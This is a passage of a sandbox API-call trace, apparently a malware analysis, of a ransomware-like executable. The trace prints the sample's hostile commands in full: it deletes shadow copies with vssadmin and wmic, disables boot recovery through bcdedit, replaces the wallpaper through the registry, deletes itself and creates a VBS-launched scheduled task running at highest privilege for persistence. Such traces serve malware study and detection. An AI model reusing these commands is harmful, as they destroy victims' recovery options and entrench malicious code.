[0060.036] FreeResource (hResData=0x526358) returned 0 [0060.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0060.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa53c4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0060.036] GetCurrentThreadId () returned 0xa68 [0060.036] GetCurrentThreadId () returned 0xa68 [0060.036] GetCurrentThreadId () returned 0xa68 [0060.037] GetTickCount () returned 0x11488df [0060.037] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb34 | out: lpPerformanceCount=0x18fb34*=18037561616) returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="Sgאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="egאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="Vgאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="Hgאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="vgאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="Dgאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="ygאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.037] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb10, cbMultiByte=1, lpWideCharStr=0x18eaf8, cchWideChar=2047 | out: lpWideCharStr="Cgאּ\x18dd \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋￾￿镌盂弱M\x18丆@籂@") returned 1 [0060.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SeVHvDyC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sevhvdyc.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0060.039] WriteFile (in: hFile=0x1a4, lpBuffer=0x28f25c0*, nNumberOfBytesToWrite=0x1493e, lpNumberOfBytesWritten=0x18fb18, lpOverlapped=0x0 | out: lpBuffer=0x28f25c0*, lpNumberOfBytesWritten=0x18fb18*=0x1493e, lpOverlapped=0x0) returned 1 [0060.041] CloseHandle (hObject=0x1a4) returned 1 [0060.044] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SeVHvDyC.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sevhvdyc.bmp")) returned 0x2020 [0060.044] CharUpperBuffW (in: lpsz="/C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", cchLength=0xe4 | out: lpsz="/C REG ADD \"HKCU\\CONTROL PANEL\\DESKTOP\" /V WALLPAPER /T REG_SZ /D \"[WP]\" /F & REG ADD \"HKCU\\CONTROL PANEL\\DESKTOP\" /V WALLPAPERSTYLE /T REG_SZ /D \"0\" /F & REG ADD \"HKCU\\CONTROL PANEL\\DESKTOP\" /V TILEWALLPAPER /T REG_SZ /D \"0\" /F") returned 0xe4 [0060.045] CharUpperBuffW (in: lpsz="[WP]", cchLength=0x4 | out: lpsz="[WP]") returned 0x4 [0060.045] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SeVHvDyC.bmp\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb20*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18fb10 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SeVHvDyC.bmp\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f", lpProcessInformation=0x18fb10*(hProcess=0x19c, hThread=0x1a4, dwProcessId=0x7ac, dwThreadId=0x344)) returned 1 [0060.053] CloseHandle (hObject=0x19c) returned 1 [0060.053] CloseHandle (hObject=0x1a4) returned 1 [0060.053] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dlnxsw.exe\" " [0060.053] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f8fe1c, cbMultiByte=31, lpWideCharStr=0x18eaf4, cchWideChar=2047 | out: lpWideCharStr="/C wscript //B //Nologo \"[DSP]\"sktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t REG_SZ /d \"0\" /f\x18廠盄䃽曋E") returned 31 [0060.053] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f5cf24, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.053] GetTickCount () returned 0x11488ef [0060.053] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb24 | out: lpPerformanceCount=0x18fb24*=18039202811) returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="f") returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="j") returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="e") returned 1 [0060.053] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="L") returned 1 [0060.054] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f5cf24, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.054] GetTickCount () returned 0x11488ef [0060.054] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb24 | out: lpPerformanceCount=0x18fb24*=18039264008) returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="B") returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="M") returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="a") returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="X") returned 1 [0060.054] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x18fb00, cbMultiByte=1, lpWideCharStr=0x18eae8, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0060.054] FindResourceW (hModule=0x400000, lpName="DS", lpType=0xa) returned 0x4f5420 [0060.054] LoadResource (hModule=0x400000, hResInfo=0x4f5420) returned 0x4f8de0 [0060.054] SizeofResource (hModule=0x400000, hResInfo=0x4f5420) returned 0xe0 [0060.054] LockResource (hResData=0x4f8de0) returned 0x4f8de0 [0060.054] FreeResource (hResData=0x4f8de0) returned 0 [0060.054] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0060.054] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0060.055] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0060.055] LockResource (hResData=0x526358) returned 0x526358 [0060.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0060.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x1f9e6ec, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0060.055] FreeResource (hResData=0x526358) returned 0 [0060.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0060.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa53c4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0060.055] GetCurrentThreadId () returned 0xa68 [0060.055] GetCurrentThreadId () returned 0xa68 [0060.055] GetCurrentThreadId () returned 0xa68 [0060.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ee8758, cbMultiByte=224, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 224 [0060.055] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ee8758, cbMultiByte=224, lpWideCharStr=0x26dd2cc, cchWideChar=224 | out: lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"[BP]\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0") returned 224 [0060.055] CharUpperBuffW (in: lpsz="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"[BP]\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchLength=0xe2 | out: lpsz="VSSADMIN DELETE SHADOWS /ALL /QUIET\r\nWMIC SHADOWCOPY DELETE\r\nBCDEDIT /SET {DEFAULT} RECOVERYENABLED NO\r\nBCDEDIT /SET {DEFAULT} BOOTSTATUSPOLICY IGNOREALLFAILURES\r\nDEL /F /Q \"[BP]\"\r\nSCHTASKS /DELETE /TN DSHCA /F\r\nDEL /F /Q %0\r\n") returned 0xe2 [0060.055] CharUpperBuffW (in: lpsz="[BP]", cchLength=0x4 | out: lpsz="[BP]") returned 0x4 [0060.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fmxj4wel.bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0060.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchWideChar=280, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 280 [0060.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchWideChar=280, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 280 [0060.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", cchWideChar=280, lpMultiByteStr=0x1ec8fb8, cbMultiByte=280, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin Delete Shadows /All /Quiet\r\nwmic SHADOWCOPY DELETE\r\nbcdedit /set {default} recoveryenabled No\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\ndel /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs\"\r\nSCHTASKS /Delete /TN DSHCA /F\r\ndel /f /q %0\r\n", lpUsedDefaultChar=0x0) returned 280 [0060.056] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ec8fb8*, nNumberOfBytesToWrite=0x118, lpNumberOfBytesWritten=0x18fa64, lpOverlapped=0x0 | out: lpBuffer=0x1ec8fb8*, lpNumberOfBytesWritten=0x18fa64*=0x118, lpOverlapped=0x0) returned 1 [0060.057] CloseHandle (hObject=0x1a4) returned 1 [0060.123] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fmxj4wel.bat")) returned 0x2020 [0060.123] GetCurrentThreadId () returned 0xa68 [0060.123] GetCurrentThreadId () returned 0xa68 [0060.123] GetCurrentThreadId () returned 0xa68 [0060.123] FindResourceW (hModule=0x400000, lpName="RB", lpType=0xa) returned 0x4f54c0 [0060.123] LoadResource (hModule=0x400000, hResInfo=0x4f54c0) returned 0x527180 [0060.123] SizeofResource (hModule=0x400000, hResInfo=0x4f54c0) returned 0xdd [0060.123] LockResource (hResData=0x527180) returned 0x527180 [0060.123] FreeResource (hResData=0x527180) returned 0 [0060.123] FindResourceW (hModule=0x400000, lpName="KN", lpType=0xa) returned 0x4f5450 [0060.123] LoadResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x526358 [0060.124] SizeofResource (hModule=0x400000, hResInfo=0x4f5450) returned 0x26 [0060.124] LockResource (hResData=0x526358) returned 0x526358 [0060.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0060.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fa53c0, cbMultiByte=38, lpWideCharStr=0x1f9e6ec, cchWideChar=38 | out: lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr\r\n42\r\n") returned 38 [0060.124] FreeResource (hResData=0x526358) returned 0 [0060.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0060.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", cchWideChar=32, lpMultiByteStr=0x1fa53c4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dkL9wVUbD1bbWmxWGU9esuGcvXtTDFxr", lpUsedDefaultChar=0x0) returned 32 [0060.124] GetCurrentThreadId () returned 0xa68 [0060.124] GetCurrentThreadId () returned 0xa68 [0060.124] GetCurrentThreadId () returned 0xa68 [0060.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ee8758, cbMultiByte=221, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 221 [0060.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ee8758, cbMultiByte=221, lpWideCharStr=0x26dd2cc, cchWideChar=221 | out: lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"[BP]\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n") returned 221 [0060.124] CharUpperBuffW (in: lpsz="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"[BP]\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchLength=0xdd | out: lpsz="OPTION EXPLICIT\r\nDIM W\r\nSET W = CREATEOBJECT(\"WSCRIPT.SHELL\")\r\nW.RUN \"CMD.EXE /C SCHTASKS /CREATE /TN DSHCA /TR \"\"[BP]\"\" /SC MINUTE /MO 5 /RL HIGHEST /F\", 0, TRUE\r\nW.RUN \"CMD.EXE /C SCHTASKS /RUN /I /TN DSHCA\", 0, FALSE\r\n") returned 0xdd [0060.124] CharUpperBuffW (in: lpsz="[BP]", cchLength=0x4 | out: lpsz="[BP]") returned 0x4 [0060.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mbmahmxw.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0060.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchWideChar=275, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 275 [0060.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchWideChar=275, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 275 [0060.126] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", cchWideChar=275, lpMultiByteStr=0x1ef3338, cbMultiByte=275, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Option Explicit\r\ndim W\r\nSet W = CreateObject(\"Wscript.Shell\")\r\nW.Run \"cmd.exe /C schtasks /Create /tn DSHCA /tr \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\"\" /sc minute /mo 5 /RL HIGHEST /F\", 0, True\r\nW.Run \"cmd.exe /C schtasks /Run /I /tn DSHCA\", 0, False\r\n", lpUsedDefaultChar=0x0) returned 275 [0060.126] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ef3338*, nNumberOfBytesToWrite=0x113, lpNumberOfBytesWritten=0x18fa64, lpOverlapped=0x0 | out: lpBuffer=0x1ef3338*, lpNumberOfBytesWritten=0x18fa64*=0x113, lpOverlapped=0x0) returned 1 [0060.127] CloseHandle (hObject=0x1a4) returned 1 [0060.129] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mBMahmXw.vbs" (normalized: 